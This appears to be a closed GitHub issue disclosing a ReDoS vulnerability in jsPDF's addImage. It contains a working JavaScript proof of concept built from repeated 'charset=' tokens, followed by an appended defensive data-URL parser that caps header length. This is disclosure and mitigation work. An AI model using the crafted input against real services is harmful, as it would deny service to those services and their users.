Closed
Description
Hi,
I would like to report a Regular Expression Denial of Service (ReDoS) vulnerability in jspdf.
It allows causing a denial of service when adding images.
You can execute the code below to reproduce the vulnerability.
```js
const fs = require("fs");
const { jsPDF } = require("jspdf");

// Builds a data-URL-like prefix with n repeated "charset=" tokens and a trailing "!".
function build_blank(n) {
  var ret = "data:/";
  for (var i = 0; i < n; i++) {
    ret += "charset=";
  }
  return ret + "!";
}

const doc = new jsPDF();
doc.text("Hello world1111!", 10, 10);
var imageData = "data:image/png;base64,";
var Octocat = fs.readFileSync("psb.png", { encoding: "latin1" }); // read but not used below
// The crafted prefix is passed to addImage as the image data.
doc.addImage(build_blank(30) + imageData, "test", 10, 40, 180, 180, undefined, "SLOW");
doc.save("a4ffff.pdf"); // will save the file in the current working directory
console.log("type:" + typeof(doc.addImage));
```
Best,
Yeting Li
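A defensive counterpart to the report above, added here as an example and taken neither from jsPDF nor from the reporter: a data URL header parser that bounds the header length and uses only flat character classes, so repeated `charset=` tokens cannot cause catastrophic regex backtracking. `parseDataUrl`, `MAX_HEADER_LENGTH` and `runSamples` are hypothetical names, the 256-character cap is an assumption, and the sample inputs are constructed.

```javascript
// Added example (not jsPDF code): parse a base64 data URL header in linear time.
// parseDataUrl and MAX_HEADER_LENGTH are hypothetical names; the cap is an assumption.
const MAX_HEADER_LENGTH = 256;
const MARKER = ";base64,";

function parseDataUrl(dataUrl) {
  if (typeof dataUrl !== "string" || !dataUrl.startsWith("data:")) return null;

  // Locate the payload with indexOf and reject oversized headers before any regex runs.
  const markerAt = dataUrl.indexOf(MARKER);
  if (markerAt === -1 || markerAt > MAX_HEADER_LENGTH) return null;

  // Header looks like "image/png" or "text/plain;charset=utf-8".
  const [mimeType, ...params] = dataUrl.slice(5, markerAt).split(";");

  // One flat class per side of "/": no nested or overlapping quantifiers.
  if (!/^\w+\/[\w.+-]+$/.test(mimeType)) return null;

  let charset;
  for (const param of params) {
    const eq = param.indexOf("=");
    if (eq === -1) return null;
    const name = param.slice(0, eq).toLowerCase();
    const value = param.slice(eq + 1);
    // Accept a single charset parameter with a plain token value, nothing else.
    if (name !== "charset" || charset !== undefined) return null;
    if (!/^[\w-]+$/.test(value)) return null;
    charset = value;
  }
  return { mimeType, charset, data: dataUrl.slice(markerAt + MARKER.length) };
}

// Constructed sample inputs: two well-formed URLs and one with the same shape
// as the input in the report (many repeated "charset=" tokens, then "!").
const SAMPLES = [
  "data:image/png;base64,iVBORw0KGgo=",
  "data:text/plain;charset=utf-8;base64,SGVsbG8=",
  "data:/" + "charset=".repeat(50000) + "!data:image/png;base64,AAAA",
];

function runSamples() {
  return SAMPLES.map((s) => parseDataUrl(s));
}

console.log(runSamples().map((r) => r && r.mimeType));
```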